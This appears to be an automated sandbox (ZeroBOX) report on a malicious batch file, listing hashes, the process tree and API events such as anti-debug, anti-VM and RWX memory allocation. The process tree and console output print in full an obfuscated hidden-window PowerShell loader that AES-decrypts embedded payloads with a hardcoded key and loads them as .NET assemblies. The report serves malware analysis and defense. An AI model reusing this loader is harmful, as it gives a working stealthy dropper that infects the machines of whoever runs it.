Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 4, 2023, 8:59 a.m.	Aug. 4, 2023, 9:02 a.m.

Size	14.2MB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`e9da2dbc0577f419fcafa37a6b5a3faa`
SHA256	`d25a23d4b46dc8fcbdb233c6c96b9d438033cba0fc10452fdffe69ebafdfea8f`
CRC32	`63BBA0AB`
ssdeep	`49152:NU1C+qSrvDLzzJmTXjAHJOazfuaAjc5lq+C1uFwMGAb/juArG6kFtAR0aUYLm7YF:o`
Yara	anti_vm_detect - Possibly employs anti-virtualization techniques

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ZMpj" C:\Users\test22\AppData\Local\Temp\a.bat
3016
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\a.bat
  2172
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\a.bat
    2276
    - a.bat.scr "C:\Users\test22\AppData\Local\Temp\a.bat.scr" -w hidden -c $ZDDX='FroDkPsmDkPsBaDkPssDkPse6DkPs4SDkPstrDkPsiDkPsngDkPs'.Replace('DkPs', '');$REDa='ElDkPsemeDkPsntDkPsAtDkPs'.Replace('DkPs', '');$SBHr='EnDkPstrDkPsyDkPsPDkPsoDkPsinDkPstDkPs'.Replace('DkPs', '');$fSbL='CreaDkPstDkPseDDkPsecDkPsrypDkPstoDkPsrDkPs'.Replace('DkPs', '');$kPEg='GeDkPstDkPsCurDkPsrenDkPstPDkPsrDkPsoceDkPsssDkPs'.Replace('DkPs', '');$vbhH='MainDkPsMoDkPsdulDkPseDkPs'.Replace('DkPs', '');$pBLk='CDkPshaDkPsnDkPsgeDkPsExtDkPseDkPsnsDkPsionDkPs'.Replace('DkPs', '');$wPOx='RDkPseDkPsadDkPsLiDkPsnesDkPs'.Replace('DkPs', '');$ZwmH='TrDkPsaDkPsnsDkPsfoDkPsrDkPsmDkPsFDkPsinaDkPslDkPsBloDkPsckDkPs'.Replace('DkPs', '');$Aemh='InDkPsvokeDkPs'.Replace('DkPs', '');$HJAU='SplDkPsitDkPs'.Replace('DkPs', '');$bCXl='LoDkPsadDkPs'.Replace('DkPs', '');function wvhkg($WpAwA){$VPBAm=[System.Security.Cryptography.Aes]::Create();$VPBAm.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VPBAm.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VPBAm.Key=[System.Convert]::$ZDDX('LmI+9BB6dU4mTC5f7d/2Xp8FBQ+CA7p+uit12QgeCXs=');$VPBAm.IV=[System.Convert]::$ZDDX('/JyMcryq8q/bpJjxAcNhzw==');$cBKYi=$VPBAm.$fSbL();$YwqDT=$cBKYi.$ZwmH($WpAwA,0,$WpAwA.Length);$cBKYi.Dispose();$VPBAm.Dispose();$YwqDT;}function BDLDg($WpAwA){$fmiJk=New-Object System.IO.MemoryStream(,$WpAwA);$hMwwv=New-Object System.IO.MemoryStream;$jDapD=New-Object System.IO.Compression.GZipStream($fmiJk,[IO.Compression.CompressionMode]::Decompress);$jDapD.CopyTo($hMwwv);$jDapD.Dispose();$fmiJk.Dispose();$hMwwv.Dispose();$hMwwv.ToArray();}$VjKYO=[System.Linq.Enumerable]::$REDa([System.IO.File]::$wPOx([System.IO.Path]::$pBLk([System.Diagnostics.Process]::$kPEg().$vbhH.FileName, $null)), 1);$kNLAh=$VjKYO.Substring(2).$HJAU(':');$XiRit=BDLDg (wvhkg ([Convert]::$ZDDX($kNLAh[0])));$grRWa=BDLDg (wvhkg ([Convert]::$ZDDX($kNLAh[1])));[System.Reflection.Assembly]::$bCXl([byte[]]$grRWa).$SBHr.$Aemh($null,$null);[System.Reflection.Assembly]::$bCXl([byte[]]$XiRit).$SBHr.$Aemh($null,$null);
      2404

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Aug. 4, 2023, 8:59 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Aug. 4, 2023, 8:59 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 4, 2023, 8:59 a.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: At line:1 char:994 console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: + $ZDDX='FroDkPsmDkPsBaDkPssDkPse6DkPs4SDkPstrDkPsiDkPsngDkPs'.Replace('DkPs', console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: '');$REDa='ElDkPsemeDkPsntDkPsAtDkPs'.Replace('DkPs', '');$SBHr='EnDkPstrDkPsyD console_handle: 0x00000047	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: kPsPDkPsoDkPsinDkPstDkPs'.Replace('DkPs', '');$fSbL='CreaDkPstDkPseDDkPsecDkPsr console_handle: 0x00000053	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ypDkPstoDkPsrDkPs'.Replace('DkPs', '');$kPEg='GeDkPstDkPsCurDkPsrenDkPstPDkPsrD console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: kPsoceDkPsssDkPs'.Replace('DkPs', '');$vbhH='MainDkPsMoDkPsdulDkPseDkPs'.Replac console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: e('DkPs', '');$pBLk='CDkPshaDkPsnDkPsgeDkPsExtDkPseDkPsnsDkPsionDkPs'.Replace(' console_handle: 0x00000077	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: DkPs', '');$wPOx='RDkPseDkPsadDkPsLiDkPsnesDkPs'.Replace('DkPs', '');$ZwmH='TrD console_handle: 0x00000083	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: kPsaDkPsnsDkPsfoDkPsrDkPsmDkPsFDkPsinaDkPslDkPsBloDkPsckDkPs'.Replace('DkPs', ' console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ');$Aemh='InDkPsvokeDkPs'.Replace('DkPs', '');$HJAU='SplDkPsitDkPs'.Replace('Dk console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: Ps', '');$bCXl='LoDkPsadDkPs'.Replace('DkPs', '');function wvhkg($WpAwA){$VPBAm console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: =[System.Security.Cryptography.Aes]::Create();$VPBAm.Mode=[System.Security.Cryp console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: tography.CipherMode]::CBC;$VPBAm.Padding=[System.Security.Cryptography.PaddingM console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ode]::PKCS7;$VPBAm.Key=[System.Convert]::$ZDDX( <<<< 'LmI+9BB6dU4mTC5f7d/2Xp8FB console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: Q+CA7p+uit12QgeCXs=');$VPBAm.IV=[System.Convert]::$ZDDX('/JyMcryq8q/bpJjxAcNhzw console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ==');$cBKYi=$VPBAm.$fSbL();$YwqDT=$cBKYi.$ZwmH($WpAwA,0,$WpAwA.Length);$cBKYi.D console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ispose();$VPBAm.Dispose();$YwqDT;}function BDLDg($WpAwA){$fmiJk=New-Object Syst console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: em.IO.MemoryStream(,$WpAwA);$hMwwv=New-Object System.IO.MemoryStream;$jDapD=New console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: -Object System.IO.Compression.GZipStream($fmiJk,[IO.Compression.CompressionMode console_handle: 0x00000107	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ]::Decompress);$jDapD.CopyTo($hMwwv);$jDapD.Dispose();$fmiJk.Dispose();$hMwwv.D console_handle: 0x00000113	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ispose();$hMwwv.ToArray();}$VjKYO=[System.Linq.Enumerable]::$REDa([System.IO.Fi console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: le]::$wPOx([System.IO.Path]::$pBLk([System.Diagnostics.Process]::$kPEg().$vbhH. console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: FileName, $null)), 1);$kNLAh=$VjKYO.Substring(2).$HJAU(':');$XiRit=BDLDg (wvhkg console_handle: 0x00000137	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ([Convert]::$ZDDX($kNLAh[0])));$grRWa=BDLDg (wvhkg ([Convert]::$ZDDX($kNLAh[1] console_handle: 0x00000143	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: )));[System.Reflection.Assembly]::$bCXl([byte[]]$grRWa).$SBHr.$Aemh($null,$null console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: );[System.Reflection.Assembly]::$bCXl([byte[]]$XiRit).$SBHr.$Aemh($null,$null); console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x00000167	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: ecordException console_handle: 0x00000173	1	1
WriteConsoleW Aug. 4, 2023, 8:59 a.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x0000017f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cedf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cea30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cec70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cedb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cedb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cedb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce0f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ce4f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005cebf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ceab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ceab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ceab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ceab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ceab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 4, 2023, 8:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ceab0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 4, 2023, 8:59 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02090000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02151000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02152000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02260000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2023, 8:59 a.m.	process_identifier: 2404 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
